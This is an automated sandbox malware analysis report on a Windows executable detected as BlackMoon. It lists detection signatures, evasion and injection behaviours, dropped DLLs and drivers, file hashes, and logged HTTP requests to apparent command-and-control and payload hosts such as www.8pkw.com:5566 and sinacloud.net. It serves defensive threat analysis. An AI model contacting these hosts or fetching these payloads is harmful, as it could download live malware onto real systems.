
Windows Analysis Report
VIP-#U4f1a#U5458#U7248.exe

Overview

General Information

Sample name: VIP-#U4f1a#U5458#U7248.exe
  (renamed because original name is a hash value)
Original sample name: VIP-.exe
Analysis ID: 1569132
MD5: 79e8c7fc08846104c300079e8f9cfff2
SHA1: b9d9e952375e973d71a077973f6be03f6b9a1987
SHA256: 0a1dc880d7c52be7311f2870481796bba315774f7c646876f88dc84837f3b4c0
Tags: exefragtoruser-zhuzhu0009

Detection

BlackMoon
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected BlackMoon Ransomware
AI detected suspicious sample
Allocates memory in foreign processes
Contains functionality to detect sleep reduction / modifications
Contains functionality to inject threads in other processes
Detected VMProtect packer
Found driver which could be used to inject code into processes
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Modifies the DNS server
Overwrites code with unconditional jumps - possibly settings hooks in foreign process
PE file has a writeable .text section
Sample is not signed and drops a device driver
Sample is protected by VMProtect
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Uses known network protocols on non-standard ports
Writes to foreign memory regions
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query locales information (e.g. system language)
Contains functionality to record screenshots
Contains functionality to retrieve information about pressed keystrokes
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates driver files
Creates files inside the system directory
Creates or modifies windows services
Deletes Internet Explorer cookies via registry
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found evasive API chain (may stop execution after checking a module file name)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May check if the current machine is a sandbox (GetTickCount - Sleep)
May sleep (evasive loops) to hinder dynamic analysis
Modifies existing windows services
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Potential key logger detected (key state polling based)
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • VIP-#U4f1a#U5458#U7248.exe (PID: 3788 cmdline: "C:\Users\user\Desktop\VIP-#U4f1a#U5458#U7248.exe" MD5: 79E8C7FC08846104C300079E8F9CFFF2)
    • D74384FB8D2C9.exe (PID: 5448 cmdline: "C:\Program Files (x86)\google\D74384FB8D2C9.exe" WfCSiyl7KCmSL4J0fXwpklp7KYEqfR6ShFd+QzmL6nTfLzmL6+rr5jmL5ejq5jx7JntO MD5: 0D79B45E55C20F14D9614596247B7DF2)
  • svchost.exe (PID: 744 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
C:\Users\user\Desktop\CFA702\FEBB9DF1\E816IBB62.dll | JoeSecurity_blackmoon | Yara detected BlackMoon Ransomware | Joe Security |
C:\Users\user\Desktop\CFA702\FEBB9DF1\E816IBB62.dll | MALWARE_Win_BlackMoon | Detects executables using BlackMoon RunTime | ditekSHen |
    • 0xcd53c:$s1: blackmoon
    • 0xcd57c:$s2: BlackMoon RunTime Error:
C:\Users\user\Desktop\CFA702\D2EDCA7E\IBB2930D\D5AESTNHE.dll | JoeSecurity_blackmoon | Yara detected BlackMoon Ransomware | Joe Security |
C:\Users\user\Desktop\CFA702\D2EDCA7E\IBB2930D\D5AESTNHE.dll | MALWARE_Win_BlackMoon | Detects executables using BlackMoon RunTime | ditekSHen |
    • 0x470fc0:$s1: blackmoon
    • 0x471000:$s2: BlackMoon RunTime Error:

      System Summary

      Source: Registry Key set | Author: frack113 | Data: Details: 3, EventID: 13, EventType: SetValue, Image: C:\Program Files (x86)\Google\D74384FB8D2C9.exe, ProcessId: 5448, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\SyncMode5
      Source: Process started | Author: vburov | Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 744, ProcessName: svchost.exe


      AV Detection

      Source: VIP-#U4f1a#U5458#U7248.exe | Avira: detected
      Source: C:\Users\user\Desktop\CFA702\D2EDCA7E\IBB2930D\D5AESTNHE.dll | Avira: detection malicious, Label: TR/Inject.zdewt
      Source: C:\Users\user\Desktop\VIP-#U4f1a#U5458#U7248.exe | Avira: detection malicious, Label: HEUR/AGEN.1315452
      Source: C:\Users\user\Desktop\CFA702\FEBB9DF1\E816IBB62.dll | Avira: detection malicious, Label: HEUR/AGEN.1328196
      Source: C:\Users\user\Desktop\CFA702\I2DF4C59\F04bWTUR.dll | Avira: detection malicious, Label: HEUR/AGEN.1328190
      Source: C:\Users\user\Desktop\CFA702\JF8BA35\F977IID54.dll | Avira: detection malicious, Label: HEUR/AGEN.1328190
      Source: C:\Users\user\Desktop\CFA702\D2EDCA7E\B790E0\A2F0jleks.dll | ReversingLabs: Detection: 75%
      Source: C:\Users\user\Desktop\CFA702\D2EDCA7E\BCF54838A16\FC14NMPKD.dll | ReversingLabs: Detection: 58%
      Source: C:\Users\user\Desktop\CFA702\D2EDCA7E\CCDF613EA366\5B38DA6A8.dll | ReversingLabs: Detection: 66%
      Source: C:\Users\user\Desktop\CFA702\D2EDCA7E\E03C4D\8FD7ijlhc.exe | ReversingLabs: Detection: 34%
      Source: C:\Users\user\Desktop\CFA702\D2EDCA7E\H4B6E7061C\E875FIB50.dll | ReversingLabs: Detection: 54%
      Source: C:\Users\user\Desktop\CFA702\D2EDCA7E\IBB2930D\D5AESTNHE.dll | ReversingLabs: Detection: 61%
      Source: C:\Users\user\Desktop\CFA702\FEBB9DF1\E816IBB62.dll | ReversingLabs: Detection: 84%
      Source: C:\Users\user\Desktop\CFA702\GD085C\5801srmps.dll | ReversingLabs: Detection: 54%
      Source: C:\Users\user\Desktop\CFA702\I2DF4C59\F04bWTUR.dll | ReversingLabs: Detection: 78%
      Source: C:\Users\user\Desktop\CFA702\JF8BA35\F977IID54.dll | ReversingLabs: Detection: 78%
      Source: C:\Windows\D74384F.sys | ReversingLabs: Detection: 62%
      Source: C:\Windows\SysWOW64\22FD558C8.sys | ReversingLabs: Detection: 62%
      Source: VIP-#U4f1a#U5458#U7248.exe | ReversingLabs: Detection: 52%
      Source: Submitted Sample | Integrated Neural Analysis Model: Matched 99.5% probability
      Source: C:\Users\user\Desktop\CFA702\D2EDCA7E\IBB2930D\D5AESTNHE.dll | Joe Sandbox ML: detected
      Source: C:\Users\user\Desktop\VIP-#U4f1a#U5458#U7248.exe | Joe Sandbox ML: detected
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe | Joe Sandbox ML: detected
      Source: C:\Users\user\Desktop\CFA702\D2EDCA7E\BCF54838A16\FC14NMPKD.dll | Joe Sandbox ML: detected
      Source: C:\Users\user\Desktop\CFA702\D2EDCA7E\E03C4D\8FD7ijlhc.exe | Joe Sandbox ML: detected
      Source: C:\Users\user\Desktop\CFA702\GD085C\5801srmps.dll | Joe Sandbox ML: detected
      Source: C:\Users\user\Desktop\CFA702\FEBB9DF1\E816IBB62.dll | Joe Sandbox ML: detected
      Source: C:\Users\user\Desktop\CFA702\D2EDCA7E\CCDF613EA366\5B38DA6A8.dll | Joe Sandbox ML: detected
      Source: C:\Users\user\Desktop\CFA702\D2EDCA7E\B790E0\A2F0jleks.dll | Joe Sandbox ML: detected
      Source: C:\Users\user\Desktop\CFA702\I2DF4C59\F04bWTUR.dll | Joe Sandbox ML: detected
      Source: C:\Users\user\Desktop\CFA702\D2EDCA7E\H4B6E7061C\E875FIB50.dll | Joe Sandbox ML: detected
      Source: C:\Users\user\Desktop\CFA702\JF8BA35\F977IID54.dll | Joe Sandbox ML: detected
      Source: VIP-#U4f1a#U5458#U7248.exe | Joe Sandbox ML: detected
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe | Code function: 2_2_6A6DB2B0 CryptMsgGetParam,_printf,_printf,CertGetNameStringA,LocalAlloc,CertGetNameStringA,CertGetNameStringA,LocalFree,CertGetNameStringA,LocalAlloc,CertGetNameStringA,_strncpy | 2_2_6A6DB2B0
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe | Code function: 2_2_6A6DB450 CryptMsgGetParam,lstrcmpA,CryptDecodeObject,CryptDecodeObject,LocalAlloc,CryptDecodeObject | 2_2_6A6DB450
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe | Code function: 2_2_6A6DB5E0 CryptQueryObject,CryptMsgGetParam,CryptMsgGetParam,LocalAlloc,CryptMsgGetParam,_printf,CertFindCertificateInStore,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CertFreeCertificateContext,CertCloseStore,CryptMsgClose | 2_2_6A6DB5E0
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe | Code function: 2_2_6A6DB5C4 CryptMsgGetParam,LocalFree | 2_2_6A6DB5C4
      Source: VIP-#U4f1a#U5458#U7248.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
      Source: VIP-#U4f1a#U5458#U7248.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
      Source: Binary string: G:\projects\funny\GamePluginCtrl\Release\gamePluginCtrl.pdb | source: D74384FB8D2C9.exe (and its process memory dumps), A2F0jleks.dll.2.dr
      Source: Binary string: \bin\xkSHWL.pdb | source: D74384FB8D2C9.exe (and its process memory dumps), E875FIB50.dll.2.dr
      Source: Binary string: DPK\bin\dlq.pdb | source: D74384FB8D2C9.exe (and its process memory dumps), 5801srmps.dll.2.dr
      Source: Binary string: DPK\bin\DPK.pdbL | source: FC14NMPKD.dll.2.dr
      Source: Binary string: G:\projects\G\tools\emptyDll\Release\emptyDll.pdb @ | source: D74384FB8D2C9.exe (and its process memory dumps), 4509OKKGD.dll.2.dr, 21AAtnoki.dll.2.dr, 346DgjhcV.dll.2.dr
      Source: Binary string: DPK\bin\DPK.pdb | source: FC14NMPKD.dll.2.dr
      Source: Binary string: DPK\bin\JDClient.pdb | source: 8FD7ijlhc.exe.2.dr
      Source: Binary string: G:\projects\G\tools\emptyDll\Release\emptyDll.pdb | source: D74384FB8D2C9.exe (and its process memory dumps), 4509OKKGD.dll.2.dr, 21AAtnoki.dll.2.dr, 346DgjhcV.dll.2.dr
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe | Code function: 2_2_0BE9BA3C FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime | 2_2_0BE9BA3C
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe | Code function: 2_2_0BE9622C GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn | 2_2_0BE9622C
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe | Code function: 2_2_6A6FB28B __EH_prolog3_GS,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA | 2_2_6A6FB28B
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe | Code function: 2_2_0040D170 _strlen,_strlen,FindFirstFileA,_strlen,_strlen,_strncpy,FindNextFileA | 2_2_0040D170
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe | Code function: 2_2_0040D640 _strlen,_strlen,FindFirstFileA,_strlen,_strlen | 2_2_0040D640
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe | File opened: C:\Users\user
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Windows
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe | File opened: C:\Users\user\AppData
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe | File opened: C:\Users\user\AppData\Local\Microsoft
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe | File opened: C:\Users\user\AppData\Local
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Windows\History\desktop.ini

      Networking

      Source: unknown | Network traffic detected: HTTP traffic on port 49706 -> 5566
      Source: unknown | Network traffic detected: HTTP traffic on port 5566 -> 49706
      Source: global traffic | TCP traffic: 192.168.2.5:49706 -> 43.154.56.182:5566
      Source: Joe Sandbox View | IP Address: 104.192.110.226
      Source: global traffic | HTTP traffic detected: GET /kss_api/io.php?a=uplog&apiver=905&c=0&gdata=1&softcode=1000011&&lgid=0&f=&x=91317019281 HTTP/1.1 | Accept: */* | User-Agent: Mozilla/4.0 (compatible; MSiE 6.0; Windows NT 5.1;) | Accept-Language: en-ch | Accept-Encoding: gzip, deflate | Host: www.8pkw.com:5566 | Connection: Keep-Alive
      Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko | Accept-Language: zh-CN | Accept-Encoding: gzip, deflate | Host: www.baidu.com | Range: bytes=0- | Connection: Keep-Alive
      Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko | Accept-Language: zh-CN | Accept-Encoding: gzip, deflate | Host: www.sogou.com | Range: bytes=0- | Connection: Keep-Alive
      Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko | Accept-Language: zh-CN | Accept-Encoding: gzip, deflate | Host: www.so.com | Range: bytes=0- | Connection: Keep-Alive
      Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko | Accept-Language: zh-CN | Accept-Encoding: gzip, deflate | Host: www.sina.com.cn | Range: bytes=0- | Connection: Keep-Alive
      Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko | Accept-Language: zh-CN | Accept-Encoding: gzip, deflate | Host: www.baidu.com | Range: bytes=0- | Connection: Keep-Alive
      Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | Accept: image/gif, image/jpeg, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */* | Accept-Language: en-CH | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) | Host: shoufeifz.qijianfz.com | Connection: Keep-Alive
      Source: global traffic | HTTP traffic detected: GET /question/data.txt HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko | Accept-Language: zh-CN | Accept-Encoding: gzip, deflate | Host: sinacloud.net | Range: bytes=0- | Connection: Keep-Alive
      Source: global traffic | HTTP traffic detected: GET /question/2024-12-05/21_22 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko | Accept-Language: zh-CN | Accept-Encoding: gzip, deflate | Host: sinacloud.net | Range: bytes=0- | Connection: Keep-Alive
      Source: global traffic | HTTP traffic detected: GET /style.css HTTP/1.1 | Accept: */* | Referer: http://shoufeifz.qijianfz.com/ | Accept-Language: en-CH | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) | Host: shoufeifz.qijianfz.com | Connection: Keep-Alive
      Source: global traffic | HTTP traffic detected: GET /question/data.txt HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko | Accept-Language: zh-CN | Accept-Encoding: gzip, deflate | Host: sinacloud.net | Range: bytes=0- | Connection: Keep-Alive
      Source: global traffic | HTTP traffic detected: GET /question/2024-12-05/21_22 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko | Accept-Language: zh-CN | Accept-Encoding: gzip, deflate | Host: sinacloud.net | Range: bytes=0- | Connection: Keep-Alive
      Source: global traffic | HTTP traffic detected: GET /question/data.txt HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko | Accept-Language: zh-CN | Accept-Encoding: gzip, deflate | Host: sinacloud.net | Range: bytes=0- | Connection: Keep-Alive
      Source: global traffic | HTTP traffic detected: GET /question/2024-12-05/21_22 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko | Accept-Language: zh-CN | Accept-Encoding: gzip, deflate | Host: sinacloud.net | Range: bytes=0- | Connection: Keep-Alive
      Source: global traffic | HTTP traffic detected: GET /question/data.txt HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko | Accept-Language: zh-CN | Accept-Encoding: gzip, deflate | Host: sinacloud.net | Range: bytes=0- | Connection: Keep-Alive
      Source: global traffic | HTTP traffic detected: GET /question/2024-12-05/21_22 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko | Accept-Language: zh-CN | Accept-Encoding: gzip, deflate | Host: sinacloud.net | Range: bytes=0- | Connection: Keep-Alive
      Source: global traffic | HTTP traffic detected: GET /question/data.txt HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko | Accept-Language: zh-CN | Accept-Encoding: gzip, deflate | Host: sinastorage.com | Range: bytes=0- | Connection: Keep-Alive
      Source: global traffic | HTTP traffic detected: GET /question/2024-12-05/21_22 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko | Accept-Language: zh-CN | Accept-Encoding: gzip, deflate | Host: sinastorage.com | Range: bytes=0- | Connection: Keep-Alive
      Source: global traffic | HTTP traffic detected: GET /question/2024-12-05/21_22 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko | Accept-Language: zh-CN | Accept-Encoding: gzip, deflate | Host: sinastorage.com | Range: bytes=0- | Connection: Keep-Alive
      Source: global traffic | HTTP traffic detected: GET /question/data.txt HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko | Accept-Language: zh-CN | Accept-Encoding: gzip, deflate | Host: sinastorage.com | Range: bytes=0- | Connection: Keep-Alive
      Source: global traffic | HTTP traffic detected: GET /question/2024-12-05/21_22 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko | Accept-Language: zh-CN | Accept-Encoding: gzip, deflate | Host: sinastorage.cn | Range: bytes=0- | Connection: Keep-Alive
      Source: global traffic | HTTP traffic detected: GET /question/data.txt HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko | Accept-Language: zh-CN | Accept-Encoding: gzip, deflate | Host: sinastorage.cn | Range: bytes=0- | Connection: Keep-Alive
      Source: global traffic | HTTP traffic detected: GET /question/data.txt HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko | Accept-Language: zh-CN | Accept-Encoding: gzip, deflate | Host: sinastorage.cn | Range: bytes=0- | Connection: Keep-Alive
      Source: global traffic | HTTP traffic detected: GET /question/2024-12-05/21_22 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko | Accept-Language: zh-CN | Accept-Encoding: gzip, deflate | Host: sinastorage.cn | Range: bytes=0- | Connection: Keep-Alive
      Source: global traffic | HTTP traffic detected: GET /question/vc8 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko | Accept-Language: zh-CN | Accept-Encoding: gzip, deflate | Host: sinastorage.com | Range: bytes=0- | Connection: Keep-Alive
      Source: global traffic | HTTP traffic detected: GET /question/vc8 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko | Accept-Language: zh-CN | Accept-Encoding: gzip, deflate | Host: sinastorage.com | Range: bytes=0- | Connection: Keep-Alive
      Source: global traffic | HTTP traffic detected: GET /question/vc8 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko | Accept-Language: zh-CN | Accept-Encoding: gzip, deflate | Host: sinastorage.cn | Range: bytes=0- | Connection: Keep-Alive
      Source: global traffic | HTTP traffic detected: GET /question/vc8 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko | Accept-Language: zh-CN | Accept-Encoding: gzip, deflate | Host: sinastorage.cn | Range: bytes=0- | Connection: Keep-Alive
      Source: global traffic | HTTP traffic detected: GET /question/vc8 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko | Accept-Language: zh-CN | Accept-Encoding: gzip, deflate | Host: sinacloud.net | Range: bytes=0- | Connection: Keep-Alive
      Source: global traffic | HTTP traffic detected: GET /question/vc8 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko | Accept-Language: zh-CN | Accept-Encoding: gzip, deflate | Host: sinacloud.net | Range: bytes=0- | Connection: Keep-Alive
      Source: global traffic | HTTP traffic detected: GET /question/vc8 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko | Accept-Language: zh-CN | Accept-Encoding: gzip, deflate | Host: sinacloud.net | Range: bytes=0- | Connection: Keep-Alive
      Source: global traffic | HTTP traffic detected: GET /question/vc8 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko | Accept-Language: zh-CN | Accept-Encoding: gzip, deflate | Host: sinacloud.net | Range: bytes=0- | Connection: Keep-Alive
      Source: global traffic | HTTP traffic detected: GET /question/s6paies HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko | Accept-Language: zh-CN | Accept-Encoding: gzip, deflate | Host: sinastorage.com | Range: bytes=0- | Connection: Keep-Alive
      Source: global traffic | HTTP traffic detected: GET /question/s6paies HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko | Accept-Language: zh-CN | Accept-Encoding: gzip, deflate | Host: sinastorage.com | Range: bytes=0- | Connection: Keep-Alive
      Source: global traffic | HTTP traffic detected: GET /question/s6paies HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko | Accept-Language: zh-CN | Accept-Encoding: gzip, deflate | Host: sinastorage.cn | Range: bytes=0- | Connection: Keep-Alive
      Source: global traffic | HTTP traffic detected: GET /question/s6paies HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko | Accept-Language: zh-CN | Accept-Encoding: gzip, deflate | Host: sinastorage.cn | Range: bytes=0- | Connection: Keep-Alive
      Source: global traffic | HTTP traffic detected: GET /question/s6paies HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko | Accept-Language: zh-CN | Accept-Encoding: gzip, deflate | Host: sinacloud.net | Range: bytes=0- | Connection: Keep-Alive
      Source: global traffic | HTTP traffic detected: GET /question/s6paies HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko | Accept-Language: zh-CN | Accept-Encoding: gzip, deflate | Host: sinacloud.net | Range: bytes=0- | Connection: Keep-Alive
      Source: global traffic | HTTP traffic detected: GET /question/s6paies HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko | Accept-Language: zh-CN | Accept-Encoding: gzip, deflate | Host: sinacloud.net | Range: bytes=0- | Connection: Keep-Alive
      Source: global traffic | HTTP traffic detected: GET /question/s6paies HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko | Accept-Language: zh-CN | Accept-Encoding: gzip, deflate | Host: sinacloud.net | Range: bytes=0- | Connection: Keep-Alive
      Source: global traffic | HTTP traffic detected: GET /question/o6saettr.zip HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko | Accept-Language: zh-CN | Accept-Encoding: gzip, deflate | Host: sinastorage.cn | Range: bytes=0- | Connection: Keep-Alive
      Source: global traffic | HTTP traffic detected: GET /question/o6saettr.zip HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko | Accept-Language: zh-CN | Accept-Encoding: gzip, deflate | Host: sinastorage.cn | Range: bytes=0- | Connection: Keep-Alive
      Source: global traffic | HTTP traffic detected: GET /question/o6saettr.zip HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko | Accept-Language: zh-CN | Accept-Encoding: gzip, deflate | Host: sinacloud.net | Range: bytes=0- | Connection: Keep-Alive
      Source: global traffic | HTTP traffic detected: GET /question/o6saettr.zip HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko | Accept-Language: zh-CN | Accept-Encoding: gzip, deflate | Host: sinacloud.net | Range: bytes=0- | Connection: Keep-Alive
      Source: global traffic | HTTP traffic detected: GET /question/o6saettr.zip HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko | Accept-Language: zh-CN | Accept-Encoding: gzip, deflate | Host: sinacloud.net | Range: bytes=0- | Connection: Keep-Alive
      Source: global traffic | HTTP traffic detected: GET /question/o6saettr.zip HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko | Accept-Language: zh-CN | Accept-Encoding: gzip, deflate | Host: sinacloud.net | Range: bytes=0- | Connection: Keep-Alive
      Source: global traffic | HTTP traffic detected: GET /question/o6saettr.zip HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko | Accept-Language: zh-CN | Accept-Encoding: gzip, deflate | Host: sinastorage.com | Range: bytes=0- | Connection: Keep-Alive
      Source: global traffic | HTTP traffic detected: GET /question/o6saettr.zip HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko | Accept-Language: zh-CN | Accept-Encoding: gzip, deflate | Host: sinastorage.com | Range: bytes=0- | Connection: Keep-Alive
      Source: global traffic | HTTP traffic detected: GET /question/c6tmassa HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko | Accept-Language: zh-CN | Accept-Encoding: gzip, deflate | Host: sinastorage.cn | Range: bytes=0- | Connection: Keep-Alive
      Source: global traffic | HTTP traffic detected: GET /question/c6tmassa HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko | Accept-Language: zh-CN | Accept-Encoding: gzip, deflate | Host: sinastorage.cn | Range: bytes=0- | Connection: Keep-Alive
